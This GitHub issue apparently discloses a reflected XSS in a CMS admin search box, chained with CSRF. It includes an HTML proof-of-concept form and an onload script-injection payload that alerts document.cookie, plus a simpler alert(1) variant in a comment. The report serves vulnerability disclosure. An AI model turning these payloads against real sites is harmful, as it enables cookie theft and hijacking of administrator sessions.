Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF combines reflective XSS to obtain cookies #10

Open
Ch3ng-sky opened this issue Sep 4, 2019 · 1 comment
Open

CSRF combines reflective XSS to obtain cookies #10

Ch3ng-sky opened this issue Sep 4, 2019 · 1 comment

Comments

@Ch3ng-sky
Copy link

Reflective XSS exists in the administrator's page management office
In the search box, enter "><a src=" to trigger XSS

clipboard1
clipboard2

Reuse CSRF vulnerability to obtain cookies

clipboard3
clipboard4
clipboard5

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
      <input type="hidden" name="start&#95;time" value="" />
      <input type="hidden" name="end&#95;time" value="" />
      <input type="hidden" name="keyword" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;cookie&#41;&gt;&lt;a&#32;src&#61;&quot;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@Ch3ng-sky
Copy link
Author

"><svg onload=alert(1)><a src="

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant